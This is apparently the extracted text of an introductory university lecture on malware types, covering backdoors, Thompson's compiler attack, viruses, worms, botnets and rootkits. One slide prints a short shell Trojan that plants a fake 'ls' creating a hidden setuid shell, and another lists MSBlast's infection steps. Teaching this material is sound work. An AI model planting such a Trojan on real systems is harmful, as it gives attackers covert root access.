Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious Software?

What is Malicious Software? Malicious Software (a.k.a. Malware) Software designed to infiltrate or damage a computer system, without the owner's informed consent -- Examples: Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software How about adware? Malware references the intent of the creator, rather than any particular features DRM v.s. Rootkit (e.g., Sony CD rootkit) 22 Coming up: Why should we care? Source: Symantec Internet Threat Report

Why should we care? Source: Symantec Internet Threat Report Coming up: Why should we care? Source: Symantec Internet Threat Report

Why should we care? Source: Symantec Internet Threat Report Coming up: Why should we care? Source: Symantec Internet Threat Report

Why should we care? Source: Symantec Internet Threat Report Coming up: Taxonomy of Malicious Software 55

Taxonomy of Malicious Software 66 Coming up: Trapdoor/Backdoor 66

Trapdoor/Backdoor Secret entry point into a system Specific user identifier or password that circumvents normal security procedures. Commonly used by developers Could be included in a compiler. Lets see Thompson’s Compiler 77 Coming up: Thompson's Compiler 77

November 1, 2004 Coming up: The Login Program Slide #19- 8 Thompson's Compiler Modify the compiler so that when it compiles login, login accepts the user's correct password or a fixed password (the same one for all users) Then modify the compiler again, so when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted Recompile the compiler Delete the source containing the modification and put the undoctored source back 8888

Coming up: The Compiler login sourcecorrect compilerlogin executable user password login sourcedoctored compilerlogin executable magic password user password or logged in The Login Program 99

November 1, 2004 Coming up: Thompson’s Lesson Slide # compiler sourcecorrect compilercompiler executable login source compiler sourcedoctored compilercompiler executable correct login executable login source rigged login executable The Compiler 10

Thompson’s Lesson Verifying the source code isn’t always enough! 11 Coming up: Logic Bomb 11

Logic Bomb Embedded in legitimate programs Activated when specified conditions met E.g., presence/absence of some file; Particular date/time or particular user When triggered, typically damages system Modify/delete files/disks Example: Disgruntled employee adds trigger that when employee’s salary record deleted from DB, all personnel records deleted also. 12 Coming up: Trojan Horse 12 Can you think of other logic bombs?

Trojan Horse Program with an expected and hidden effect Appears normal/expected hidden effect violates security policy User tricked into executing Trojan horse Expects (and sees) expected behavior Hidden effect performed with user’s authorization Attacker cat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* eof Victim ls 13 Coming up: Trojan Horse Example: NetBus 13

Trojan Horse Example: NetBus Designed for Windows NT system Victim uploads and installs this Usually disguised as a game program, or in one Acts as a server, accepting and executing commands for remote administrator This includes intercepting keystrokes and mouse motions and sending them to attacker Also allows attacker to upload, download files 14 Coming up: Virus 14

Virus Program that inserts itself into one or more files and performs some action Insertion phase is inserting itself into file Execution phase is performing some (possibly null) action Self-replicating code Generally tries to remain undetected Pseudocode If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program (step done only by Trojan horses to remain hidden) 14 Coming up: Early Virus Reports 15

Early Virus Reports Brain (Pakistani) virus (1986) Written for IBM PCs Alters boot sectors of floppies, spreads to other floppies MacMag Peace virus (1987) Written for Macintosh Prints “ universal message of peace ” on March 2, 1988 and deletes itself 16 Coming up: Virus Types 16

Virus Types Boot Sector Problem: How to ensure virus “carrier” executed? Solution: Place in boot sector of disk Run on any boot Propagate by altering boot disk creation Less common with few boots off floppies Executable Malicious code placed at beginning of legitimate program (EXE or.COM Runs when application run 15 Coming up: Virus Types Brain virus used this 17

Virus Types Macro Virus Infected “executable” isn’t machine code Relies on something “executed” inside application data Common example: Macros Otherwise similar properties to other viruses Architecture-independent Application-dependent 16 Coming up: Macro Virus Example 18

Macro Virus Example Melissa Infected Microsoft Word 97 and Word 98 documents Windows and Macintosh systems Invoked when program opens infected file Installs itself as “ open ” macro and copies itself into Normal template This way, infects any files that are opened in future Invokes mail program, sends itself to everyone in user ’ s address book 19 Coming up: Virus Types 19

Virus Types Armored Encrypt virus Prevents “signature” to detect virus Stealth Conceal Infection Trap read and disinfect Let execute call infected file Terminate and Stay Resident (TSR) Stays active in memory after application complete Allows infection of previously unknown files Trap calls that execute a program 17 Coming up: Virus Types Request for file length: return length of uninfected file Request to open file: temporarily disinfect file, and reinfect on closing Request to load file for execution: load infected file Request for file length: return length of uninfected file Request to open file: temporarily disinfect file, and reinfect on closing Request to load file for execution: load infected file 20

Virus Types Polymorphic A virus that changes its form each time it inserts itself into another program Idea is to prevent signature detection by changing the “ signature ” or instructions used for deciphering routine At instruction level: substitute instructions At algorithm level: different algorithms to achieve the same purpose Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine) 17 Coming up: Polymorphic Example 21

Polymorphic Example These are different instructions (with different bit patterns) but have the same effect: add 0 to register subtract 0 from register xor 0 with register no-op Polymorphic virus would pick randomly from among these instructions 22 Coming up: Worm 22

Worm Runs independently Does not require a host program Propagates a fully working version of itself to other machines Carries a payload performing hidden tasks Backdoors, spam relays, DDoS agents; … Phases Probing  Exploitation  Replication  Payload 18 Coming up: Work Propagation 23 So, how is a virus different from a worm? 23

Work Propagation 19 Coming up: MSBlast Worm (Aug 2003) 24

MSBlast Worm (Aug 2003) 1. Exploits target on port 135/TCP 3. Connects to target on port 4444/TCP 5. Creates “TFTP Server” on port Sends “TFTP” command to shell 8. Sends “START msblast.exe” command 10. Closes connection 2. Binds svchost.exe to port 4444/TCP via injected code 4. Creates shell “cmd.exe” and binds it to port 4444/TCP Runs TFTP command: teleports msblast.exe file 9. Runs worm on target 11. Shell closes tftp –l GET msblast.exe TCP protocal: Direction: Inbound Local end point ports: 135 Application: ANY Remote End Point: ANY/ANY Rule valid: ALWAYS Action: DENY TCP protocal: Direction: Inbound Local end point ports: 135 Application: ANY Remote End Point: ANY/ANY Rule valid: ALWAYS Action: DENY Infected New Victim 20 Coming up: Zombie 25

Zombie Secretly takes over another networked computer by exploiting software flows Builds the compromised computers into a zombie network or botnet Uses it to indirectly launch attacks E.g., DDoS 21 Coming up: Zombie 26 Lets see how we create zombies.. 26

Lets see how we create zombies.. Computer Coming up: Zombie: Steps

Zombie: Steps - 1 Attacker Unsecured Computers Attacker scans Internet for unsecured systems that can be compromised Coming up: Zombie: Steps

Zombie: Steps - 2 Attacker Unsecured Computers Attacker secretly installs zombie agent program, turning unsecured computers into zombies Coming up: Zombie: Steps

Zombie: Steps - 3 Attacker Zombies Zombie agents “phone home” and connect to a master server 33 Master Server 24 Coming up: Zombie: Steps

Zombie: Steps - 4 Attacker Zombies Attacker sends commands to Maser Server to launch a DDoS attack against a targeted system 44 Master Server 25 Coming up: Zombie: Steps

Zombie: Steps - 5 Attacker Zombies Master server sends signal to zombies to launch attack on targeted system 55 Master Server TARGET 26 Coming up: Zombie: Steps

Zombie: Steps - 6 Attacker Zombies Target system is overwhelmed by zombie requests denying requests from normal users 66 Master Server TARGET User Request Denied 27 Coming up: Rootkit 32 33

Rootkit “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer” Goals: Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.) Provide hidden backdoor access 28 Coming up: Linux RootKit III 33 34

ls Trojaned! Hide files du Trojaned! Hide files ifconfigTrojaned! Hide sniffing netstat Trojaned! Hide connections chfn Trojaned! User->r00t chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access passwd Trojaned! User->r00t ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs linsniffer Packet sniffer! fix File fixer! z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor! lled lastlog editor! bindshell port/shell type daemon! tcpd Trojaned! Hide connections, avoid denies Linux RootKit III 29 Coming up: Rootkit 34 35

Rootkit Simple rootkits: Modify user programs (ls, ps) Detectable by tools like Tripwire Sophisticated rootkits: Modify the kernel itself Hard to detect from userland 30 Coming up: Rootkit Classification 35 36

Rootkit Classification 31 Coming up: Rootkit Classification Replace apps Add code to all apps See: es.html?issue=62&id=12 Add code to all apps See: es.html?issue=62&id=12 Replace/modify kernel modules 36 37

Rootkit Classification 32 Coming up: Lessons Run entire OS in a virtual machine 37 38

Lessons Malware comes in many types and styles It’s not going away and will always hit new platforms as they come out We’ll need multiple approaches to defend against them. 38 End of presentation Next up: Malware Defense! 38 39